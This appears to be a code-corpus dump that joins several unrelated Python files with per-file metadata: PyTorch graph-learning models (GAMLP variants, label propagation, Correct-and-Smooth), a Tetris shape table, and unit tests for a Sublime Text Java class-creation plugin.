for feats, weight in zip(feat_list, self.agg_feats):
new_feats.append(
(feats * weight.unsqueeze(0)).sum(dim=1).squeeze())
return new_feats
class NARS_JK_GAMLP(nn.Module):
def __init__(self, nfeat, hidden, nclass, num_hops, num_feats, alpha, n_layers_1, n_layers_2, n_layers_3, act="relu", dropout=0.5, input_drop=0.0, attn_drop=0.0, label_drop=0.0, pre_process=False, residual=False, pre_dropout=False, bns=False):
super(NARS_JK_GAMLP, self).__init__()
self.aggregator = WeightedAggregator(num_feats, nfeat, num_hops)
self.model = JK_GAMLP(nfeat, hidden, nclass, num_hops, dropout, input_drop, attn_drop,
alpha, n_layers_1, n_layers_2, pre_process, residual, pre_dropout, bns)
def forward(self, feats_dict, label_emb):
feats = self.aggregator(feats_dict)
out1 = self.model(feats, label_emb)
return out1
class NARS_R_GAMLP(nn.Module):
def __init__(self, nfeat, hidden, nclass, num_hops, num_feats, alpha, n_layers_1, n_layers_2, n_layers_3, act="relu", dropout=0.5, input_drop=0.0, attn_drop=0.0, label_drop=0.0, pre_process=False, residual=False, pre_dropout=False, bns=False):
super(NARS_R_GAMLP, self).__init__()
self.aggregator = WeightedAggregator(num_feats, nfeat, num_hops)
self.model = R_GAMLP(nfeat, hidden, nclass, num_hops, dropout, input_drop,
attn_drop, alpha, n_layers_1, n_layers_2, pre_process, residual, pre_dropout, bns)
def forward(self, feats_dict, label_emb):
feats = self.aggregator(feats_dict)
out1 = self.model(feats, label_emb)
return out1
class NARS_JK_GAMLP_RLU(nn.Module):
def __init__(self, nfeat, hidden, nclass, num_hops, num_feats, alpha, n_layers_1, n_layers_2, n_layers_3, act="relu", dropout=0.5, input_drop=0.0, attn_drop=0.0, label_drop=0.0, pre_process=False, residual=False, pre_dropout=False, bns=False):
super(NARS_JK_GAMLP_RLU, self).__init__()
self.aggregator = WeightedAggregator(num_feats, nfeat, num_hops)
self.model = JK_GAMLP_RLU(nfeat, hidden, nclass, num_hops, dropout, input_drop, attn_drop,
label_drop, alpha, n_layers_1, n_layers_2, n_layers_3, act, pre_process, residual, pre_dropout, bns)
def forward(self, feats_dict, label_emb):
feats = self.aggregator(feats_dict)
out1 = self.model(feats, label_emb)
return out1
class NARS_R_GAMLP_RLU(nn.Module):
def __init__(self, nfeat, hidden, nclass, num_hops, num_feats, alpha, n_layers_1, n_layers_2, n_layers_3, act="relu", dropout=0.5, input_drop=0.0, attn_drop=0.0, label_drop=0.0, pre_process=False, residual=False, pre_dropout=False, bns=False):
super(NARS_R_GAMLP_RLU, self).__init__()
self.aggregator = WeightedAggregator(num_feats, nfeat, num_hops)
self.model = R_GAMLP_RLU(nfeat, hidden, nclass, num_hops, dropout, input_drop, attn_drop,
label_drop, alpha, n_layers_1, n_layers_2, n_layers_3, act, pre_process, residual, pre_dropout, bns)
def forward(self, feats_dict, label_emb):
feats = self.aggregator(feats_dict)
out1 = self.model(feats, label_emb)
return out1
class MLPLinear(nn.Module):
def __init__(self, in_dim, out_dim):
super(MLPLinear, self).__init__()
self.linear = nn.Linear(in_dim, out_dim)
self.reset_parameters()
def reset_parameters(self):
self.linear.reset_parameters()
def forward(self, x):
return F.log_softmax(self.linear(x), dim=-1)
class MLP(nn.Module):
def __init__(self, in_dim, hid_dim, out_dim, num_layers, dropout=0.):
super(MLP, self).__init__()
assert num_layers >= 2
self.linears = nn.ModuleList()
self.bns = nn.ModuleList()
self.linears.append(nn.Linear(in_dim, hid_dim))
self.bns.append(nn.BatchNorm1d(hid_dim))
for _ in range(num_layers - 2):
self.linears.append(nn.Linear(hid_dim, hid_dim))
self.bns.append(nn.BatchNorm1d(hid_dim))
self.linears.append(nn.Linear(hid_dim, out_dim))
self.dropout = dropout
self.reset_parameters()
def reset_parameters(self):
for layer in self.linears:
layer.reset_parameters()
for layer in self.bns:
layer.reset_parameters()
def forward(self, x):
for linear, bn in zip(self.linears[:-1], self.bns):
x = linear(x)
x = F.relu(x, inplace=True)
x = bn(x)
x = F.dropout(x, p=self.dropout, training=self.training)
x = self.linears[-1](x)
return F.log_softmax(x, dim=-1)
class LabelPropagation(nn.Module):
r"""
Description
-----------
Introduced in `Learning from Labeled and Unlabeled Data with Label Propagation <https://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.14.3864&rep=rep1&type=pdf>`_
.. math::
\mathbf{Y}^{\prime} = \alpha \cdot \mathbf{D}^{-1/2} \mathbf{A}
\mathbf{D}^{-1/2} \mathbf{Y} + (1 - \alpha) \mathbf{Y},
where unlabeled data is inferred by labeled data via propagation.
Parameters
----------
num_layers: int
The number of propagations.
alpha: float
The :math:`\alpha` coefficient.
adj: str
'DAD': D^-0.5 * A * D^-0.5
'DA': D^-1 * A
'AD': A * D^-1
"""
def __init__(self, num_layers, alpha, adj='DAD'):
super(LabelPropagation, self).__init__()
self.num_layers = num_layers
self.alpha = alpha
self.adj = adj
@torch.no_grad()
def forward(self, g, labels, mask=None, post_step=lambda y: y.clamp_(0., 1.)):
with g.local_scope():
if labels.dtype == torch.long:
labels = F.one_hot(labels.view(-1)).to(torch.float32)
y = labels
if mask is not None:
y = torch.zeros_like(labels)
y[mask] = labels[mask]
last = (1 - self.alpha) * y
degs = g.in_degrees().float().clamp(min=1)
norm = torch.pow(degs, -0.5 if self.adj == 'DAD' else -1).to(labels.device).unsqueeze(1)
for _ in range(self.num_layers):
# Assume the graphs to be undirected
if self.adj in ['DAD', 'AD']:
y = norm * y
g.ndata['h'] = y
g.update_all(fn.copy_u('h', 'm'), fn.sum('m', 'h'))
y = self.alpha * g.ndata.pop('h')
if self.adj in ['DAD', 'DA']:
y = y * norm
y = post_step(last + y)
return y
class CorrectAndSmooth(nn.Module):
r"""
Description
-----------
Introduced in `Combining Label Propagation and Simple Models Out-performs Graph Neural Networks <https://arxiv.org/abs/2010.13993>`_
Parameters
----------
num_correction_layers: int
The number of correct propagations.
correction_alpha: float
The coefficient of correction.
correction_adj: str
'DAD': D^-0.5 * A * D^-0.5
'DA': D^-1 * A
'AD': A * D^-1
num_smoothing_layers: int
The number of smooth propagations.
smoothing_alpha: float
The coefficient of smoothing.
smoothing_adj: str
'DAD': D^-0.5 * A * D^-0.5
'DA': D^-1 * A
'AD': A * D^-1
autoscale: bool, optional
If set to True, will automatically determine the scaling factor :math:`\sigma`. Default is True.
scale: float, optional
The scaling factor :math:`\sigma`, in case :obj:`autoscale = False`. Default is 1.
"""
def __init__(self,
num_correction_layers,
correction_alpha,
correction_adj,
num_smoothing_layers,
smoothing_alpha,
smoothing_adj,
autoscale=True,
scale=1.):
super(CorrectAndSmooth, self).__init__()
self.autoscale = autoscale
self.scale = scale
self.prop1 = LabelPropagation(num_correction_layers,
correction_alpha,
correction_adj)
self.prop2 = LabelPropagation(num_smoothing_layers,
smoothing_alpha,
smoothing_adj)
def correct(self, g, y_soft, y_true, mask):
with g.local_scope():
assert abs(float(y_soft.sum()) / y_soft.size(0) - 1.0) < 1e-2
numel = int(mask.sum()) if mask.dtype == torch.bool else mask.size(0)
assert y_true.size(0) == numel
if y_true.dtype == torch.long:
y_true = F.one_hot(y_true.view(-1), y_soft.size(-1)).to(y_soft.dtype)
error = torch.zeros_like(y_soft)
error[mask] = y_true - y_soft[mask]
if self.autoscale:
smoothed_error = self.prop1(g, error, post_step=lambda x: x.clamp_(-1., 1.))
sigma = error[mask].abs().sum() / numel
scale = sigma / smoothed_error.abs().sum(dim=1, keepdim=True)
scale[scale.isinf() | (scale > 1000)] = 1.0
result = y_soft + scale * smoothed_error
result[result.isnan()] = y_soft[result.isnan()]
return result
else:
def fix_input(x):
x[mask] = error[mask]
return x
smoothed_error = self.prop1(g, error, post_step=fix_input)
result = y_soft + self.scale * smoothed_error
result[result.isnan()] = y_soft[result.isnan()]
return result
def smooth(self, g, y_soft, y_true, mask):
with g.local_scope():
numel = int(mask.sum()) if mask.dtype == torch.bool else mask.size(0)
assert y_true.size(0) == numel
if y_true.dtype == torch.long:
y_true = F.one_hot(y_true.view(-1), y_soft.size(-1)).to(y_soft.dtype)
y_soft[mask] = y_true
return self.prop2(g, y_soft)
| 42.64918 | 247 | 0.593327 | 3,506 | 26,016 | 4.159441 | 0.078722 | 0.019338 | 0.014195 | 0.01056 | 0.816636 | 0.787767 | 0.774669 | 0.747309 | 0.73812 | 0.728657 | 0 | 0.01718 | 0.290744 | 26,016 | 609 | 248 | 42.719212 | 0.773141 | 0.06546 | 0 | 0.72211 | 0 | 0 | 0.005888 | 0 | 0 | 0 | 0 | 0 | 0.008114 | 1 | 0.068966 | false | 0 | 0.010142 | 0.002028 | 0.137931 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
eb71273418f78ec643698471bd5e49ecccd0591c | 430 | py | Python | tetris/tetris_graph.py | huodahaha/tetris_python | 86ffec042bb892e7a7484e73d2d50e252cbdc9dc | [
"MIT"
] | 1 | 2016-09-18T09:28:02.000Z | 2016-09-18T09:28:02.000Z | tetris/tetris_graph.py | huodahaha/tetris_python | 86ffec042bb892e7a7484e73d2d50e252cbdc9dc | [
"MIT"
] | null | null | null | tetris/tetris_graph.py | huodahaha/tetris_python | 86ffec042bb892e7a7484e73d2d50e252cbdc9dc | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# 碰撞表
graph[0] = [[0,0,0,0], [0,1,0,0], [0,1,1,1], [0,0,0,0]]
graph[1] = [[0,0,0,0], [0,0,0,0], [0,1,0,0], [1,1,1,0]]
graph[2] = [[0,0,0,0], [0,0,0,0], [0,0,1,0], [1,1,1,0]]
graph[3] = [[0,0,0,0], [0,0,0,0], [1,1,0,0], [1,1,0,0]]
graph[4] = [[0,0,0,0], [0,0,0,0], [1,1,0,0], [0,1,1,0]]
graph[5] = [[0,0,0,0], [0,0,0,0], [0,1,1,0], [1,1,0,0]]
graph[6] = [[0,0,0,0], [0,0,0,0], [0,0,0,0], [1,1,1,1]] | 47.777778 | 56 | 0.388372 | 130 | 430 | 1.284615 | 0.092308 | 0.790419 | 0.934132 | 1.005988 | 0.796407 | 0.772455 | 0.497006 | 0.497006 | 0.497006 | 0.437126 | 0 | 0.321716 | 0.132558 | 430 | 9 | 57 | 47.777778 | 0.126005 | 0.060465 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
694f4301ae0d777ac1d1f558eae57d9211c14fa5 | 137 | py | Python | datasets/preprocess/__init__.py | Renovamen/Text-Classification | 4a4aa4001c402ed4371ebaabe1393b27794e5992 | [
"MIT"
] | 72 | 2020-06-23T18:26:47.000Z | 2022-03-26T13:33:30.000Z | datasets/preprocess/__init__.py | Renovamen/Text-Classification | 4a4aa4001c402ed4371ebaabe1393b27794e5992 | [
"MIT"
] | 5 | 2020-12-04T13:31:09.000Z | 2021-08-03T14:11:52.000Z | datasets/preprocess/__init__.py | Renovamen/Text-Classification | 4a4aa4001c402ed4371ebaabe1393b27794e5992 | [
"MIT"
] | 15 | 2020-06-24T16:08:39.000Z | 2022-02-04T06:53:38.000Z | from .utils import get_clean_text
from .document import run_prepro as run_doc_prepro
from .sentence import run_prepro as run_sent_prepro
| 34.25 | 51 | 0.861314 | 24 | 137 | 4.583333 | 0.541667 | 0.163636 | 0.272727 | 0.309091 | 0.363636 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.116788 | 137 | 3 | 52 | 45.666667 | 0.909091 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
15d333e4737e7dd7d45d90e5e82f8184dd689e6d | 24,995 | py | Python | tests/commands/test_create.py | evandrocoan/Javatar | b38d4f9d852565d6dcecb236386628b4e56d9d09 | [
"MIT"
] | 142 | 2015-01-11T19:43:17.000Z | 2021-11-15T11:44:56.000Z | tests/commands/test_create.py | evandroforks/Javatar | b38d4f9d852565d6dcecb236386628b4e56d9d09 | [
"MIT"
] | 46 | 2015-01-02T20:29:37.000Z | 2018-09-15T05:12:52.000Z | tests/commands/test_create.py | evandroforks/Javatar | b38d4f9d852565d6dcecb236386628b4e56d9d09 | [
"MIT"
] | 25 | 2015-01-16T01:33:39.000Z | 2022-01-07T11:12:43.000Z | import sublime
import unittest
from unittest.mock import patch, MagicMock
from Javatar.commands.creates import (
JavatarCreateCommand,
JavatarCreatePackageCommand
)
class TestCreateClass(unittest.TestCase):
@patch(
"sublime.Window.folders",
return_value=[]
)
@patch(
"sublime.Window.active_view",
return_value=None
)
def test_parse_create_invalid_location(self, *_):
window = MagicMock(spec=sublime.Window)
cmd = JavatarCreateCommand(window)
tests = [
"", "~", ":", "<", ":<", "<:", "alpha.", ".alpha", ".alpha.",
"alpha.bravo.", ".alpha.bravo", ".alpha.bravo.", ":charlie",
"<charlie", ":charlie,delta", "<charlie,delta"
]
for test in tests:
self.assertEqual(
cmd.parse_create(test),
"Cannot specify package location"
)
self.assertEqual(
cmd.parse_create("~" + test),
"Cannot specify package location"
)
@patch(
"Javatar.core.state_property._StateProperty.is_project",
return_value=True
)
@patch(
"Javatar.core.state_property._StateProperty.get_source_folder",
return_value="alpha"
)
@patch(
"Javatar.core.state_property._StateProperty.get_dir",
return_value="alpha/bravo"
)
def test_parse_create_invalid_name(self, *_):
window = MagicMock(spec=sublime.Window)
cmd = JavatarCreateCommand(window)
tests = [
"", "~", ":", "<", ":<", "<:", "alpha.", ".alpha", ".alpha.",
"alpha.bravo.", ".alpha.bravo", ".alpha.bravo.", ":charlie",
"<charlie", ":charlie,delta", "<charlie,delta"
]
for test in tests:
self.assertEqual(
cmd.parse_create(test),
"Invalid class naming"
)
self.assertEqual(
cmd.parse_create("~" + test),
"Invalid class naming"
)
@patch(
"Javatar.core.state_property._StateProperty.is_project",
return_value=True
)
@patch(
"Javatar.core.state_property._StateProperty.get_source_folder",
return_value="alpha"
)
@patch(
"Javatar.core.state_property._StateProperty.get_dir",
return_value="alpha/bravo"
)
def test_parse_create(self, *_):
window = MagicMock(spec=sublime.Window)
cmd = JavatarCreateCommand(window)
tests = [
{
"input": "Alpha",
"expected": {
"relative_path": True,
"class_name": "Alpha",
"package": "bravo",
"as_main": False,
"extends": [],
"implements": [],
"visibility_keyword": "public",
"modifier_keyword": "",
"directory": "alpha/bravo/",
"file": "alpha/bravo/Alpha.java"
}
}, {
"input": "Alpha.Bravo",
"expected": {
"relative_path": True,
"class_name": "Bravo",
"package": "bravo.Alpha",
"as_main": False,
"extends": [],
"implements": [],
"visibility_keyword": "public",
"modifier_keyword": "",
"directory": "alpha/bravo/Alpha",
"file": "alpha/bravo/Alpha/Bravo.java"
}
}, {
"input": "Alpha.Bravo.Charlie",
"expected": {
"relative_path": True,
"class_name": "Charlie",
"package": "bravo.Alpha.Bravo",
"as_main": False,
"extends": [],
"implements": [],
"visibility_keyword": "public",
"modifier_keyword": "",
"directory": "alpha/bravo/Alpha/Bravo",
"file": "alpha/bravo/Alpha/Bravo/Charlie.java"
}
}, {
"input": "Alpha.Bravo.CharlieAsMain",
"expected": {
"relative_path": True,
"class_name": "Charlie",
"package": "bravo.Alpha.Bravo",
"as_main": True,
"extends": [],
"implements": [],
"visibility_keyword": "public",
"modifier_keyword": "",
"directory": "alpha/bravo/Alpha/Bravo",
"file": "alpha/bravo/Alpha/Bravo/Charlie.java"
}
}, {
"input": "Alpha.Bravo.privateCharlieAsMain",
"expected": {
"relative_path": True,
"class_name": "Charlie",
"package": "bravo.Alpha.Bravo",
"as_main": True,
"extends": [],
"implements": [],
"visibility_keyword": "private",
"modifier_keyword": "",
"directory": "alpha/bravo/Alpha/Bravo",
"file": "alpha/bravo/Alpha/Bravo/Charlie.java"
}
}, {
"input": "Alpha.Bravo.abstractCharlieAsMain",
"expected": {
"relative_path": True,
"class_name": "Charlie",
"package": "bravo.Alpha.Bravo",
"as_main": True,
"extends": [],
"implements": [],
"visibility_keyword": "public",
"modifier_keyword": "abstract",
"directory": "alpha/bravo/Alpha/Bravo",
"file": "alpha/bravo/Alpha/Bravo/Charlie.java"
}
}, {
"input": "Alpha.Bravo.ProtectedFinalCharlieAsMain",
"expected": {
"relative_path": True,
"class_name": "Charlie",
"package": "bravo.Alpha.Bravo",
"as_main": True,
"extends": [],
"implements": [],
"visibility_keyword": "protected",
"modifier_keyword": "final",
"directory": "alpha/bravo/Alpha/Bravo",
"file": "alpha/bravo/Alpha/Bravo/Charlie.java"
}
}, {
"input": "Alpha.Bravo:Charlie",
"expected": {
"relative_path": True,
"class_name": "Bravo",
"package": "bravo.Alpha",
"as_main": False,
"extends": ["Charlie"],
"implements": [],
"visibility_keyword": "public",
"modifier_keyword": "",
"directory": "alpha/bravo/Alpha",
"file": "alpha/bravo/Alpha/Bravo.java"
}
}, {
"input": "Alpha.Bravo:Charlie,Delta",
"expected": {
"relative_path": True,
"class_name": "Bravo",
"package": "bravo.Alpha",
"as_main": False,
"extends": ["Charlie", "Delta"],
"implements": [],
"visibility_keyword": "public",
"modifier_keyword": "",
"directory": "alpha/bravo/Alpha",
"file": "alpha/bravo/Alpha/Bravo.java"
}
}, {
"input": "Alpha.Bravo<Charlie,Delta",
"expected": {
"relative_path": True,
"class_name": "Bravo",
"package": "bravo.Alpha",
"as_main": False,
"extends": [],
"implements": ["Charlie", "Delta"],
"visibility_keyword": "public",
"modifier_keyword": "",
"directory": "alpha/bravo/Alpha",
"file": "alpha/bravo/Alpha/Bravo.java"
}
}, {
"input": "Alpha.Bravo:Charlie<Delta",
"expected": {
"relative_path": True,
"class_name": "Bravo",
"package": "bravo.Alpha",
"as_main": False,
"extends": ["Charlie"],
"implements": ["Delta"],
"visibility_keyword": "public",
"modifier_keyword": "",
"directory": "alpha/bravo/Alpha",
"file": "alpha/bravo/Alpha/Bravo.java"
}
}, {
"input": "Alpha.Bravo:Charlie,Delta<Echo,Foxtrot",
"expected": {
"relative_path": True,
"class_name": "Bravo",
"package": "bravo.Alpha",
"as_main": False,
"extends": ["Charlie", "Delta"],
"implements": ["Echo", "Foxtrot"],
"visibility_keyword": "public",
"modifier_keyword": "",
"directory": "alpha/bravo/Alpha",
"file": "alpha/bravo/Alpha/Bravo.java"
}
}, {
"input": "~Alpha",
"expected": {
"relative_path": False,
"class_name": "Alpha",
"package": "",
"as_main": False,
"extends": [],
"implements": [],
"visibility_keyword": "public",
"modifier_keyword": "",
"directory": "alpha/",
"file": "alpha/Alpha.java"
}
}, {
"input": "~Alpha.Bravo",
"expected": {
"relative_path": False,
"class_name": "Bravo",
"package": "Alpha",
"as_main": False,
"extends": [],
"implements": [],
"visibility_keyword": "public",
"modifier_keyword": "",
"directory": "alpha/Alpha",
"file": "alpha/Alpha/Bravo.java"
}
}, {
"input": "~Alpha.Bravo.Charlie",
"expected": {
"relative_path": False,
"class_name": "Charlie",
"package": "Alpha.Bravo",
"as_main": False,
"extends": [],
"implements": [],
"visibility_keyword": "public",
"modifier_keyword": "",
"directory": "alpha/Alpha/Bravo",
"file": "alpha/Alpha/Bravo/Charlie.java"
}
}, {
"input": "~Alpha.Bravo.CharlieAsMain",
"expected": {
"relative_path": False,
"class_name": "Charlie",
"package": "Alpha.Bravo",
"as_main": True,
"extends": [],
"implements": [],
"visibility_keyword": "public",
"modifier_keyword": "",
"directory": "alpha/Alpha/Bravo",
"file": "alpha/Alpha/Bravo/Charlie.java"
}
}, {
"input": "~Alpha.Bravo.privateCharlieAsMain",
"expected": {
"relative_path": False,
"class_name": "Charlie",
"package": "Alpha.Bravo",
"as_main": True,
"extends": [],
"implements": [],
"visibility_keyword": "private",
"modifier_keyword": "",
"directory": "alpha/Alpha/Bravo",
"file": "alpha/Alpha/Bravo/Charlie.java"
}
}, {
"input": "~Alpha.Bravo.abstractCharlieAsMain",
"expected": {
"relative_path": False,
"class_name": "Charlie",
"package": "Alpha.Bravo",
"as_main": True,
"extends": [],
"implements": [],
"visibility_keyword": "public",
"modifier_keyword": "abstract",
"directory": "alpha/Alpha/Bravo",
"file": "alpha/Alpha/Bravo/Charlie.java"
}
}, {
"input": "~Alpha.Bravo.ProtectedFinalCharlieAsMain",
"expected": {
"relative_path": False,
"class_name": "Charlie",
"package": "Alpha.Bravo",
"as_main": True,
"extends": [],
"implements": [],
"visibility_keyword": "protected",
"modifier_keyword": "final",
"directory": "alpha/Alpha/Bravo",
"file": "alpha/Alpha/Bravo/Charlie.java"
}
}, {
"input": "~Alpha.Bravo:Charlie",
"expected": {
"relative_path": False,
"class_name": "Bravo",
"package": "Alpha",
"as_main": False,
"extends": ["Charlie"],
"implements": [],
"visibility_keyword": "public",
"modifier_keyword": "",
"directory": "alpha/Alpha",
"file": "alpha/Alpha/Bravo.java"
}
}, {
"input": "~Alpha.Bravo:Charlie,Delta",
"expected": {
"relative_path": False,
"class_name": "Bravo",
"package": "Alpha",
"as_main": False,
"extends": ["Charlie", "Delta"],
"implements": [],
"visibility_keyword": "public",
"modifier_keyword": "",
"directory": "alpha/Alpha",
"file": "alpha/Alpha/Bravo.java"
}
}, {
"input": "~Alpha.Bravo<Charlie,Delta",
"expected": {
"relative_path": False,
"class_name": "Bravo",
"package": "Alpha",
"as_main": False,
"extends": [],
"implements": ["Charlie", "Delta"],
"visibility_keyword": "public",
"modifier_keyword": "",
"directory": "alpha/Alpha",
"file": "alpha/Alpha/Bravo.java"
}
}, {
"input": "~Alpha.Bravo:Charlie<Delta",
"expected": {
"relative_path": False,
"class_name": "Bravo",
"package": "Alpha",
"as_main": False,
"extends": ["Charlie"],
"implements": ["Delta"],
"visibility_keyword": "public",
"modifier_keyword": "",
"directory": "alpha/Alpha",
"file": "alpha/Alpha/Bravo.java"
}
}, {
"input": "~Alpha.Bravo:Charlie,Delta<Echo,Foxtrot",
"expected": {
"relative_path": False,
"class_name": "Bravo",
"package": "Alpha",
"as_main": False,
"extends": ["Charlie", "Delta"],
"implements": ["Echo", "Foxtrot"],
"visibility_keyword": "public",
"modifier_keyword": "",
"directory": "alpha/Alpha",
"file": "alpha/Alpha/Bravo.java"
}
}
]
for test in tests:
info = cmd.parse_create(test["input"])
for key in test["expected"]:
if key == "package":
self.assertEqual(
test["expected"][key],
info[key].as_class_path()
)
else:
self.assertEqual(test["expected"][key], info[key])
def test_build_prefix(self):
window = MagicMock(spec=sublime.Window)
cmd = JavatarCreateCommand(window)
tests = [
{
"create_type": "Class",
"visibility_keyword": "",
"modifier_keyword": "",
"as_main": False,
"expected": "Class"
}, {
"create_type": "Interface",
"visibility_keyword": "public",
"modifier_keyword": "",
"as_main": False,
"expected": "Public interface"
}, {
"create_type": "Enumerator",
"visibility_keyword": "",
"modifier_keyword": "final",
"as_main": False,
"expected": "Final enumerator"
}, {
"create_type": "Class",
"visibility_keyword": "default",
"modifier_keyword": "abstract",
"as_main": False,
"expected": "Default abstract class"
}, {
"create_type": "Class",
"visibility_keyword": "default",
"modifier_keyword": "abstract",
"as_main": True,
"expected": "Default abstract main class"
}
]
for test in tests:
cmd.args = {
"create_type": test["create_type"]
}
self.assertEqual(
cmd.build_prefix(test),
test["expected"]
)
def test_quote_list(self):
window = MagicMock(spec=sublime.Window)
cmd = JavatarCreateCommand(window)
self.assertEqual(
cmd.quote_list([
"Alpha"
]),
"\"Alpha\""
)
self.assertEqual(
cmd.quote_list([
"Alpha", "Bravo", "Charlie"
]),
"\"Alpha\", \"Bravo\", \"Charlie\""
)
def test_build_additional_text_class(self):
window = MagicMock(spec=sublime.Window)
cmd = JavatarCreateCommand(window)
cmd.args = {
"create_type": "Class"
}
self.assertEqual(
cmd.build_additional_text({
"extends": ["Alpha", "Bravo"],
"implements": ["Charlie", "Delta"]
}),
", extends \"Alpha\", \"Bravo\", implements \"Charlie\", \"Delta\" "
"[Warning! Class can be extent only once]"
)
self.assertEqual(
cmd.build_additional_text({
"extends": ["Alpha", "Bravo", "Charlie"],
"implements": ["Delta", "Echo", "Foxtrot"]
}),
", extends \"Alpha\", \"Bravo\" and 1 more classes"
", implements \"Delta\", \"Echo\" and 1 more classes "
"[Warning! Class can be extent only once]"
)
def test_build_additional_text_enumerator(self):
window = MagicMock(spec=sublime.Window)
cmd = JavatarCreateCommand(window)
cmd.args = {
"create_type": "Enumerator"
}
self.assertEqual(
cmd.build_additional_text({
"extends": ["Alpha"],
"implements": []
}),
", extends \"Alpha\" "
"[Warning! Enumerator use \"implements\" instead of \"extends\"]"
)
def test_build_additional_text_interface(self):
window = MagicMock(spec=sublime.Window)
cmd = JavatarCreateCommand(window)
cmd.args = {
"create_type": "Interface"
}
self.assertEqual(
cmd.build_additional_text({
"extends": [],
"implements": ["Alpha"]
}),
", implements \"Alpha\" "
"[Warning! Interface use \"extends\" instead of \"implements\"]"
)
class TestCreatePackage(unittest.TestCase):
@patch(
"sublime.Window.folders",
return_value=[]
)
@patch(
"sublime.Window.active_view",
return_value=None
)
def test_parse_create_invalid_location(self, *_):
window = MagicMock(spec=sublime.Window)
cmd = JavatarCreatePackageCommand(window)
tests = [
"", "~", "alpha.", ".alpha", ".alpha.",
"alpha.bravo.", ".alpha.bravo", ".alpha.bravo.", ":charlie",
"<charlie", ":charlie,delta", "<charlie,delta", "alpha:bravo",
"alpha<bravo", "alpha:bravo<charlie"
]
for test in tests:
self.assertEqual(
cmd.parse_create(test),
"Cannot specify package location"
)
self.assertEqual(
cmd.parse_create("~" + test),
"Cannot specify package location"
)
@patch(
"Javatar.core.state_property._StateProperty.is_project",
return_value=True
)
@patch(
"Javatar.core.state_property._StateProperty.get_source_folder",
return_value="alpha"
)
@patch(
"Javatar.core.state_property._StateProperty.get_dir",
return_value="alpha/bravo"
)
def test_parse_create_invalid_name(self, *_):
window = MagicMock(spec=sublime.Window)
cmd = JavatarCreatePackageCommand(window)
tests = [
"", "~", ":", "<", ":<", "<:", "alpha.", ".alpha", ".alpha.",
"alpha.bravo.", ".alpha.bravo", ".alpha.bravo.", ":charlie",
"<charlie", ":charlie,delta", "<charlie,delta", "alpha:bravo",
"alpha<bravo", "alpha:bravo<charlie"
]
for test in tests:
self.assertEqual(
cmd.parse_create(test),
"Invalid package naming"
)
self.assertEqual(
cmd.parse_create("~" + test),
"Invalid package naming"
)
@patch(
"Javatar.core.state_property._StateProperty.is_project",
return_value=True
)
@patch(
"Javatar.core.state_property._StateProperty.get_source_folder",
return_value="alpha"
)
@patch(
"Javatar.core.state_property._StateProperty.get_dir",
return_value="alpha/bravo"
)
def test_parse_create(self, *_):
window = MagicMock(spec=sublime.Window)
cmd = JavatarCreatePackageCommand(window)
tests = [
{
"input": "Alpha",
"expected": {
"package": "bravo.Alpha",
"directory": "alpha/bravo/Alpha"
}
}, {
"input": "Alpha.Bravo",
"expected": {
"package": "bravo.Alpha.Bravo",
"directory": "alpha/bravo/Alpha/Bravo"
}
}, {
"input": "Alpha.Bravo.Charlie",
"expected": {
"package": "bravo.Alpha.Bravo.Charlie",
"directory": "alpha/bravo/Alpha/Bravo/Charlie"
}
}, {
"input": "~Alpha",
"expected": {
"package": "Alpha",
"directory": "alpha/Alpha"
}
}, {
"input": "~Alpha.Bravo",
"expected": {
"package": "Alpha.Bravo",
"directory": "alpha/Alpha/Bravo"
}
}, {
"input": "~Alpha.Bravo.Charlie",
"expected": {
"package": "Alpha.Bravo.Charlie",
"directory": "alpha/Alpha/Bravo/Charlie"
}
}
]
for test in tests:
info = cmd.parse_create(test["input"])
for key in test["expected"]:
if key == "package":
self.assertEqual(
test["expected"][key],
info[key].as_class_path()
)
else:
self.assertEqual(test["expected"][key], info[key])
| 36.172214 | 80 | 0.418244 | 1,724 | 24,995 | 5.907193 | 0.063805 | 0.128633 | 0.05597 | 0.058916 | 0.904949 | 0.877062 | 0.843284 | 0.831206 | 0.812451 | 0.784073 | 0 | 0.000144 | 0.445409 | 24,995 | 690 | 81 | 36.224638 | 0.734526 | 0 | 0 | 0.759513 | 0 | 0 | 0.325785 | 0.084457 | 0 | 0 | 0 | 0 | 0.028919 | 1 | 0.016743 | false | 0 | 0.006088 | 0 | 0.025875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
15dec395211f061d913e457d101b799f66151c12 | 93,284 | py | Python | boto3_type_annotations_with_docs/boto3_type_annotations/autoscaling_plans/client.py | cowboygneox/boto3_type_annotations | 450dce1de4e066b939de7eac2ec560ed1a7ddaa2 | [
"MIT"
